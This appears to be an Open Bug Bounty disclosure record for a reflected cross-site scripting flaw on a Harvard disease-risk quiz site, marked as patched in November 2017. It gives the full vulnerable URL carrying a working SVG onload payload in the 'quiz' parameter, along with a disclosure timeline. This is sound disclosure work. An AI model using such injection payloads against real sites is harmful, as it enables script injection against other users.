Lucene search

K
openbugbountyMaxOBB:215285
HistoryFeb 24, 2017 - 9:28 p.m.

diseaseriskindex.harvard.edu XSS vulnerability

2017-02-2421:28:00
Max
www.openbugbounty.org
12
Vulnerable URL:
http://www.diseaseriskindex.harvard.edu/update/hccpquiz.pl?lang=english&func;=start&quiz;=%22%3E%3Csvg/onload=alert(/OPENBUGBOUNTY/)%3E
Details:
Description Value
Patched: Yes, at 25.11.2017
Latest check for patch: 25.11.2017 10:37 GMT
Vulnerability type: XSS
Vulnerability status: Publicly disclosed
Alexa Rank Unknown / Not calculated
VIP website status: No
Check diseaseriskindex.harvard.edu SSL connection: (Grade: F)
Coordinated Disclosure Timeline:
Description Value
Vulnerability submitted via Open Bug Bounty 24 February, 2017 21:28 GMT
Generic security notifications sent to website owner 24 February, 2017 21:33 GMT
Vulnerability details disclosed by researcher 24 February, 2017 21:33 GMT
Vulnerability patched by the website owner 25 November, 2017 10:37 GMT